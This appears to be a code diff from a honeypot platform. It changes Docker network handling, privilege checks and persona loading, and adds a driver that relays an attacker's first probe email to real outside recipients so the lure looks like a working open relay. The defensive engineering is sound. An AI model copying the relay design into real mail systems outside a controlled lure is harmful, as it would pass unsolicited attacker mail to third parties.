hydrated = await _hydrated(repo, topology_id)
|
||||||
lan = _lan_by_name(hydrated, payload["name"])
|
lan = _lan_by_name(hydrated, payload["name"])
|
||||||
if lan is None:
|
if lan is None:
|
||||||
@@ -389,6 +1017,17 @@ async def apply_update_lan(
|
|||||||
fields[key] = payload[key]
|
fields[key] = payload[key]
|
||||||
if not fields:
|
if not fields:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||||
|
if is_live:
|
||||||
|
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||||
|
if hostile:
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||||
|
f"teardown + redeploy required"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_lan(lan["id"], fields)
|
await repo.update_lan(lan["id"], fields)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|||||||
@@ -151,11 +151,20 @@ def _ensure_network(
|
|||||||
options.update(extra_options)
|
options.update(extra_options)
|
||||||
|
|
||||||
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
||||||
|
# networks.list() doesn't populate Containers — reload to get the
|
||||||
|
# full inspect payload (including connected container IDs).
|
||||||
|
try:
|
||||||
|
net.reload()
|
||||||
|
except docker.errors.APIError:
|
||||||
|
pass
|
||||||
|
|
||||||
if net.attrs.get("Driver") == driver:
|
if net.attrs.get("Driver") == driver:
|
||||||
# Same driver — but if the IPAM pool drifted (different subnet,
|
# Same driver — but if the IPAM pool drifted (different subnet,
|
||||||
# gateway, or ip-range than this deploy asks for), reusing it
|
# gateway, or ip-range than this deploy asks for), reusing it
|
||||||
# hands out addresses from the old pool and we race the real LAN.
|
# hands out addresses from the old pool and we race the real LAN.
|
||||||
# Compare and rebuild on mismatch.
|
# Compare and rebuild on mismatch — but only when no containers
|
||||||
|
# are attached. With active endpoints Docker refuses the remove
|
||||||
|
# with 403; just attach to the existing network instead.
|
||||||
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
||||||
cur = pools[0] if pools else {}
|
cur = pools[0] if pools else {}
|
||||||
if (
|
if (
|
||||||
@@ -164,8 +173,15 @@ def _ensure_network(
|
|||||||
and cur.get("IPRange") == ip_range
|
and cur.get("IPRange") == ip_range
|
||||||
):
|
):
|
||||||
return # right driver AND matching pool, leave it alone
|
return # right driver AND matching pool, leave it alone
|
||||||
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
|
if net.attrs.get("Containers"):
|
||||||
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
|
# Active endpoints — can't safely rebuild. Attach to the
|
||||||
|
# existing network; IPAM drift on ip_range only affects
|
||||||
|
# Docker's auto-assign pool, which DECNET doesn't use
|
||||||
|
# (IPs are always set explicitly in the compose file).
|
||||||
|
return
|
||||||
|
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
|
||||||
|
# Disconnect any live containers first so `remove()` doesn't
|
||||||
|
# refuse with ErrNetworkInUse.
|
||||||
for cid in (net.attrs.get("Containers") or {}):
|
for cid in (net.attrs.get("Containers") or {}):
|
||||||
try:
|
try:
|
||||||
net.disconnect(cid, force=True)
|
net.disconnect(cid, force=True)
|
||||||
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
|||||||
# Host-side macvlan interface (hairpin fix)
|
# Host-side macvlan interface (hairpin fix)
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
def _require_root() -> None:
|
# Linux capability bit positions — see capabilities(7).
|
||||||
if os.geteuid() != 0:
|
_CAP_NET_ADMIN = 12
|
||||||
raise PermissionError(
|
|
||||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
|
||||||
)
|
def _has_cap_net_admin() -> bool:
    """Report whether CAP_NET_ADMIN is in this process's effective capability set.

    The answer comes from the ``CapEff`` line of ``/proc/self/status`` (a hex
    bitmask) rather than ``capget(2)``, which keeps libcap out of the
    dependency list. Bit ``_CAP_NET_ADMIN`` of that mask is the one tested.

    Returns:
        ``True`` when the bit is set; ``False`` when it is clear, when the
        status file cannot be read, or when it has no ``CapEff`` line.
    """
    try:
        with open("/proc/self/status", "r") as status:
            # Only the first CapEff line matters; stop scanning once found.
            cap_eff = next(
                (row for row in status if row.startswith("CapEff:")),
                None,
            )
    except OSError:
        return False
    if cap_eff is None:
        return False
    mask = int(cap_eff.split()[1], 16)
    return (mask >> _CAP_NET_ADMIN) & 1 == 1
|
||||||
|
|
||||||
|
|
||||||
|
def _require_net_admin() -> None:
    """Fail fast when the process cannot run ``ip link add ... macvlan``.

    The kernel gates netlink RTM_NEWLINK for macvlan/ipvlan slaves on
    CAP_NET_ADMIN. Running as euid 0 is sufficient (root holds every cap) but
    not required, so a unit file using
    ``AmbientCapabilities=CAP_NET_ADMIN`` is accepted without making the whole
    API run as root.

    Raises:
        PermissionError: the process is neither root nor holds CAP_NET_ADMIN.
    """
    # Root short-circuits the /proc lookup.
    privileged = os.geteuid() == 0 or _has_cap_net_admin()
    if not privileged:
        raise PermissionError(
            "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
            "Either run as root or grant the cap (systemd: "
            "AmbientCapabilities=CAP_NET_ADMIN)."
        )
|
||||||
|
|
||||||
|
|
||||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||||
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
host-helper first: the two drivers can share a parent NIC on paper but
|
host-helper first: the two drivers can share a parent NIC on paper but
|
||||||
leaving the opposite helper in place is just cruft after a driver swap.
|
leaving the opposite helper in place is just cruft after a driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||||
dangling on the parent NIC after the driver swap.
|
dangling on the parent NIC after the driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
|
|||||||
strict=False,
|
strict=False,
|
||||||
)
|
)
|
||||||
return str(network)
|
return str(network)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Container veth resolution (for tc netem tarpit)
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process.

    Args:
        container_name: Name (or id) passed to the Docker API lookup.

    Returns:
        The non-zero ``State.Pid`` value from the container's inspect data.

    Raises:
        LookupError: the container does not exist, or it exists but reports
            PID 0 (i.e. it is not running).
    """
    client = docker.from_env()
    try:
        try:
            container = client.containers.get(container_name)
        except docker.errors.NotFound as exc:
            # Keep the original API error attached for debugging.
            raise LookupError(f"container {container_name!r} not found") from exc
        pid = container.attrs["State"]["Pid"]
    finally:
        # from_env() opens a connection pool per call; release it so repeated
        # lookups don't accumulate open sockets.
        client.close()
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
|
||||||
|
|
||||||
|
|
||||||
|
def get_container_veth(container_name: str) -> str:
    """Resolve the host-side interface paired with the container's ``eth0``.

    The peer interface index is read from ``/sys/class/net/eth0/iflink``
    inside the container (via ``docker exec``) and then looked up in the
    host's ``ip link show`` output. No ``nsenter`` is involved.

    Args:
        container_name: Container to inspect.

    Returns:
        The interface name from the matching ``ip link`` line, with any
        ``@ifNN`` suffix removed.

    Raises:
        LookupError: the ``docker exec`` call failed, or no host link line
            starts with the reported peer index.
    """
    probe = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if probe.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {probe.stderr.strip()}"
        )

    peer_index = probe.stdout.strip()
    wanted_prefix = f"{peer_index}:"
    host_links = _run(["ip", "link", "show"]).stdout.splitlines()
    # Line format: "42: veth3a4b5c@if41: <BROADCAST,...>"
    hit = next((row for row in host_links if row.startswith(wanted_prefix)), None)
    if hit is None:
        raise LookupError(
            f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
        )
    name_field = hit.split(":")[1].strip()
    return name_field.split("@")[0]
|
||||||
|
|||||||
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
|
|||||||
try:
|
try:
|
||||||
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
||||||
except ImportError: # pragma: no cover - scheduler always exists
|
except ImportError: # pragma: no cover - scheduler always exists
|
||||||
EmailAction = None # type: ignore[assignment]
|
EmailAction = None # type: ignore[assignment, misc]
|
||||||
if EmailAction is not None and isinstance(action, EmailAction):
|
if EmailAction is not None and isinstance(action, EmailAction):
|
||||||
from decnet.orchestrator.drivers.email import EmailDriver
|
from decnet.orchestrator.drivers.email import EmailDriver
|
||||||
return EmailDriver()
|
return EmailDriver()
|
||||||
|
|||||||
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
|
|||||||
"""Convenience accessor for telemetry / logging."""
|
"""Convenience accessor for telemetry / logging."""
|
||||||
return self._llm.model
|
return self._llm.model
|
||||||
|
|
||||||
async def run(self, action: EmailAction) -> ActivityResult:
|
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
|
||||||
return await self._run_email(action)
|
return await self._run_email(action)
|
||||||
|
|
||||||
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
||||||
|
|||||||
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
"""SMTP probe-relay driver.
|
||||||
|
|
||||||
|
Forwards the attacker's first probe email via the master's real internet
|
||||||
|
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||||
|
the master (where this worker runs) does.
|
||||||
|
|
||||||
|
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import email
|
||||||
|
import smtplib
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||||
|
|
||||||
|
|
||||||
|
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
    """Return *body* with a ``From:`` header added if one is absent.

    Args:
        body: Raw message bytes as captured from the SMTP session.
        mail_from: Envelope sender to use as the header value.

    Returns:
        *body* unchanged when it already carries a non-empty ``From`` header
        (or cannot be parsed); otherwise *body* prefixed with a ``From:`` line.
        When the message has no header section at all, a blank separator line
        is inserted as well so the original text stays in the body instead of
        being glued onto the header block.
    """
    try:
        msg = email.message_from_bytes(body)
    except Exception:
        return body
    if msg["From"]:
        return body

    # mail_from is attacker-supplied; drop CR/LF so it cannot smuggle extra
    # header lines into the relayed message.
    sender = mail_from.replace("\r", "").replace("\n", "")
    header_line = f"From: {sender}\r\n".encode()

    # Header-less message that does not already start with the blank
    # header/body separator: add one after our new header.
    if not msg.keys() and not body.startswith((b"\r\n", b"\n")):
        header_line += b"\r\n"
    return header_line + body
|
||||||
|
|
||||||
|
|
||||||
|
def forward_probe(
    *,
    svc_cfg: dict[str, Any],
    stored_as: str,
    decky_name: str,
    mail_from: str,
    rcpt_to: list[str],
    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
    """Read the stored .eml from disk and forward it via the upstream relay.

    Blocking I/O only (file read + ``smtplib``), so callers on an event loop
    should run it in a worker thread.

    Args:
        svc_cfg: ``smtp_relay`` service config; reads ``upstream_host``,
            ``upstream_port`` (default 25), ``upstream_user``,
            ``upstream_pass`` and ``upstream_sender``.
        stored_as: File name of the captured message inside
            ``<artifacts_root>/<decky_name>/smtp``.
        decky_name: Decky whose artifacts directory holds the message.
        mail_from: Attacker-supplied envelope sender; used for the ``From:``
            header and, when ``upstream_sender`` is unset, the envelope.
        rcpt_to: Envelope recipients.
        artifacts_root: Root of the artifacts tree.

    Returns:
        ``(True, "")`` on success or ``(False, reason)`` on failure. No
        exception is expected to escape for bad config or I/O errors.
    """
    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
    if not upstream_host:
        return False, "upstream_host not configured"

    # stored_as originates from the decky side. Resolve the final path and
    # insist it stays inside this decky's smtp directory, otherwise "../" or
    # an absolute name (or a planted symlink) would let arbitrary host files
    # be mailed to the attacker-chosen recipients.
    try:
        smtp_dir = (Path(artifacts_root) / decky_name / "smtp").resolve()
        eml_path = (smtp_dir / stored_as).resolve()
    except (OSError, RuntimeError, ValueError) as exc:
        return False, f"cannot read eml: {exc}"
    if smtp_dir not in eml_path.parents:
        return False, "cannot read eml: path escapes the decky smtp artifacts directory"

    try:
        body = eml_path.read_bytes()
    except OSError as exc:
        return False, f"cannot read eml: {exc}"

    if not rcpt_to:
        return False, "no recipients"

    try:
        upstream_port = int(svc_cfg.get("upstream_port") or 25)
    except (TypeError, ValueError):
        # Honour the "(False, reason)" contract instead of raising.
        return False, "invalid upstream_port"
    upstream_user = (svc_cfg.get("upstream_user") or "").strip()
    upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
    envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from

    # Ensure the message has a From: header so mail clients show the attacker's
    # address rather than falling back to the envelope sender (upstream_sender).
    # Minimal relay-test scripts often omit headers entirely.
    body = _ensure_from_header(body, mail_from)

    try:
        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
            conn.ehlo()
            if conn.has_extn("STARTTLS"):
                conn.starttls()
                # Capabilities must be re-negotiated after the TLS upgrade.
                conn.ehlo()
            if upstream_user and upstream_pass:
                conn.login(upstream_user, upstream_pass)
            conn.sendmail(envelope_from, rcpt_to, body)
        return True, ""
    except Exception as exc:
        # Reason is stored in a bounty payload; keep it bounded.
        return False, str(exc)[:256]
|
||||||
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
import shlex
|
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
from datetime import datetime
|
||||||
import base64
|
|
||||||
from datetime import datetime, timezone
|
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||||
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
|
|||||||
) -> ActivityResult:
|
) -> ActivityResult:
|
||||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||||
|
|
||||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||||
it doesn't all stamp at wall-clock-now (the realism failure
|
backdate the file (otherwise everything stamps at wall-clock-now
|
||||||
this migration is fixing).
|
— the realism failure this path was originally fixing).
|
||||||
"""
|
"""
|
||||||
|
from decnet.decky_io import write_file_to_container
|
||||||
|
|
||||||
container = _container_for(decky_name)
|
container = _container_for(decky_name)
|
||||||
b64 = base64.b64encode(content).decode("ascii")
|
success, error = await write_file_to_container(
|
||||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||||
# container's local TZ doesn't drift the mtime.
|
|
||||||
if mtime is not None:
|
|
||||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
|
||||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
|
||||||
else:
|
|
||||||
touch_cmd = f"touch {shlex.quote(path)}"
|
|
||||||
sh_cmd = (
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
|
||||||
f"base64 -d > {shlex.quote(path)} && "
|
|
||||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
|
||||||
f"{touch_cmd}"
|
|
||||||
)
|
)
|
||||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
|
||||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
|
||||||
success = rc == 0
|
|
||||||
payload: dict[str, Any] = {
|
payload: dict[str, Any] = {
|
||||||
"dst_decky": decky_name,
|
"dst_decky": decky_name,
|
||||||
"path": path,
|
"path": path,
|
||||||
"bytes": len(content),
|
"bytes": len(content),
|
||||||
"rc": rc,
|
"rc": 0 if success else 1,
|
||||||
"stderr": stderr.strip()[:256] if not success else None,
|
"stderr": error if not success else None,
|
||||||
}
|
}
|
||||||
return ActivityResult(success=success, payload=payload)
|
return ActivityResult(success=success, payload=payload)
|
||||||
|
|
||||||
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
|
||||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
|
||||||
host to share the destination container's separator semantics, but
|
|
||||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
|
||||||
idx = path.rfind("/")
|
|
||||||
if idx <= 0:
|
|
||||||
return "/"
|
|
||||||
return path[:idx]
|
|
||||||
|
|||||||
@@ -131,13 +131,13 @@ async def _resolve_personas(
|
|||||||
topology = await repo.get_topology(topology_id)
|
topology = await repo.get_topology(topology_id)
|
||||||
if not topology:
|
if not topology:
|
||||||
return [], source
|
return [], source
|
||||||
return (
|
if isinstance(topology, dict):
|
||||||
parse_personas(
|
raw = topology.get("email_personas")
|
||||||
topology.get("email_personas"),
|
lang = topology.get("language_default") or "en"
|
||||||
language_default=topology.get("language_default") or "en",
|
else:
|
||||||
),
|
raw = topology.email_personas
|
||||||
source,
|
lang = topology.language_default or "en"
|
||||||
)
|
return parse_personas(raw, language_default=lang), source
|
||||||
# Fleet / shard / anything else → global pool.
|
# Fleet / shard / anything else → global pool.
|
||||||
return global_pool.load(), source
|
return global_pool.load(), source
|
||||||
|
|
||||||
@@ -175,7 +175,7 @@ async def pick(
|
|||||||
)
|
)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||||
if len(active) < 2:
|
if len(active) < 2:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||||
|
|||||||
@@ -311,17 +311,22 @@ async def _resolve_personas(
|
|||||||
return enriched
|
return enriched
|
||||||
|
|
||||||
|
|
||||||
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
|
def _topology_personas(topology) -> list[EmailPersona]:
|
||||||
if not topology:
|
if not topology:
|
||||||
return []
|
return []
|
||||||
raw = topology.get("email_personas")
|
if isinstance(topology, dict):
|
||||||
|
raw = topology.get("email_personas")
|
||||||
|
lang = topology.get("language_default") or "en"
|
||||||
|
else:
|
||||||
|
raw = topology.email_personas
|
||||||
|
lang = topology.language_default or "en"
|
||||||
if raw is None:
|
if raw is None:
|
||||||
return []
|
return []
|
||||||
if isinstance(raw, list):
|
if isinstance(raw, list):
|
||||||
return parse_personas(raw, language_default=topology.get("language_default") or "en")
|
return parse_personas(raw, language_default=lang)
|
||||||
if isinstance(raw, str):
|
if isinstance(raw, str):
|
||||||
try:
|
try:
|
||||||
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
|
return parse_personas(json.loads(raw), language_default=lang)
|
||||||
except json.JSONDecodeError:
|
except json.JSONDecodeError:
|
||||||
return []
|
return []
|
||||||
return []
|
return []
|
||||||
|
|||||||
@@ -25,6 +25,7 @@ import secrets
|
|||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
publish_safely,
|
publish_safely,
|
||||||
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
|
|||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator import events, scheduler
|
from decnet.orchestrator import events, scheduler
|
||||||
from decnet.orchestrator.drivers import get_driver_for
|
from decnet.orchestrator.drivers import get_driver_for
|
||||||
|
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||||
from decnet.orchestrator.emailgen import (
|
from decnet.orchestrator.emailgen import (
|
||||||
events as email_events,
|
events as email_events,
|
||||||
scheduler as email_scheduler,
|
scheduler as email_scheduler,
|
||||||
@@ -127,6 +129,7 @@ async def orchestrator_worker(
|
|||||||
# operator's intent rather than the baked-in defaults. A failure
|
# operator's intent rather than the baked-in defaults. A failure
|
||||||
# here logs and falls through; the planner already holds defaults.
|
# here logs and falls through; the planner already holds defaults.
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
|
await _refresh_llm_config(repo)
|
||||||
|
|
||||||
shutdown = asyncio.Event()
|
shutdown = asyncio.Event()
|
||||||
heartbeat_task = asyncio.create_task(
|
heartbeat_task = asyncio.create_task(
|
||||||
@@ -138,6 +141,9 @@ async def orchestrator_worker(
|
|||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
run_control_listener(bus, "orchestrator", shutdown),
|
run_control_listener(bus, "orchestrator", shutdown),
|
||||||
)
|
)
|
||||||
|
probe_task = asyncio.create_task(
|
||||||
|
_run_smtp_probe_listener(repo, shutdown),
|
||||||
|
)
|
||||||
tick_n = 0
|
tick_n = 0
|
||||||
try:
|
try:
|
||||||
while not shutdown.is_set():
|
while not shutdown.is_set():
|
||||||
@@ -156,8 +162,9 @@ async def orchestrator_worker(
|
|||||||
await _periodic_prune(repo)
|
await _periodic_prune(repo)
|
||||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
|
await _refresh_llm_config(repo)
|
||||||
finally:
|
finally:
|
||||||
for t in (heartbeat_task, control_task):
|
for t in (heartbeat_task, control_task, probe_task):
|
||||||
t.cancel()
|
t.cancel()
|
||||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||||
await t
|
await t
|
||||||
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
|
|||||||
logger.warning("realism config refresh: rejected payload: %s", exc)
|
logger.warning("realism config refresh: rejected payload: %s", exc)
|
||||||
|
|
||||||
|
|
||||||
|
async def _refresh_llm_config(repo: BaseRepository) -> None:
    """Load the LLM config via ``load_from_db`` and hand it to ``apply``.

    Does nothing when no config is returned. A failure inside ``apply`` is
    logged as a warning and otherwise ignored.
    """
    from decnet.realism.llm.config import apply, load_from_db

    llm_cfg = await load_from_db(repo)
    if llm_cfg is not None:
        try:
            apply(llm_cfg)
        except Exception as err:  # noqa: BLE001
            logger.warning("llm config refresh: apply failed: %s", err)
|
||||||
|
|
||||||
|
|
||||||
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
||||||
total = sum(w for _, w in _ACTION_WEIGHTS)
|
total = sum(w for _, w in _ACTION_WEIGHTS)
|
||||||
target = rng.randint(1, total)
|
target = rng.randint(1, total)
|
||||||
@@ -303,7 +322,7 @@ async def _pick_action(
|
|||||||
)
|
)
|
||||||
elif kind == "email":
|
elif kind == "email":
|
||||||
try:
|
try:
|
||||||
action = await email_scheduler.pick(repo, rand=rng)
|
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
logger.debug("orchestrator: email pick failed: %s", exc)
|
logger.debug("orchestrator: email pick failed: %s", exc)
|
||||||
action = None
|
action = None
|
||||||
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
|||||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||||
|
|
||||||
|
|
||||||
|
async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to smtp ``probe.pending`` events and process each one.

    Runs as a long-lived subtask alongside the tick loop, on its own bus
    connection. Every received event's payload is passed to
    ``_handle_probe_pending``; an error while handling one event is logged and
    the loop continues. The ``shutdown`` flag is checked each time an event
    arrives. If the bus cannot be set up, or the subscription fails, a warning
    is logged and the listener exits.

    Args:
        repo: Repository handed through to the probe handler.
        shutdown: Event that, once set, ends the loop on the next event.

    Raises:
        asyncio.CancelledError: re-raised so task cancellation propagates.
    """
    # Bound up-front so the cleanup below never touches an unassigned name
    # when get_bus() itself fails.
    bus = None
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        if bus is not None:
            # Best-effort close; a failing close must not mask the real exit reason.
            with contextlib.suppress(Exception):
                await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
    """Forward one pending SMTP probe upstream and record the outcome.

    Silently returns when the payload lacks ``decky``, ``attacker_ip`` or
    ``stored_as``, when the decky is unknown, when its ``smtp_relay`` service
    has no ``upstream_host``, or when this (attacker_ip, decky) pair has
    already reached ``probe_limit`` relays (default 1). Otherwise the message
    is forwarded in a worker thread and a ``probe_relay`` bounty is stored
    with the result.

    Args:
        repo: Repository used for the decky lookup, relay count and bounty.
        payload: Event payload; ``rcpt_to`` is read as a comma-separated
            string.
    """
    decky_name = (payload.get("decky") or "").strip()
    attacker_ip = (payload.get("attacker_ip") or "").strip()
    stored_as = (payload.get("stored_as") or "").strip()
    mail_from = (payload.get("mail_from") or "").strip()
    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()

    if not (decky_name and attacker_ip and stored_as):
        return

    decky_row = await repo.get_fleet_decky_by_name(decky_name)
    if not decky_row:
        return
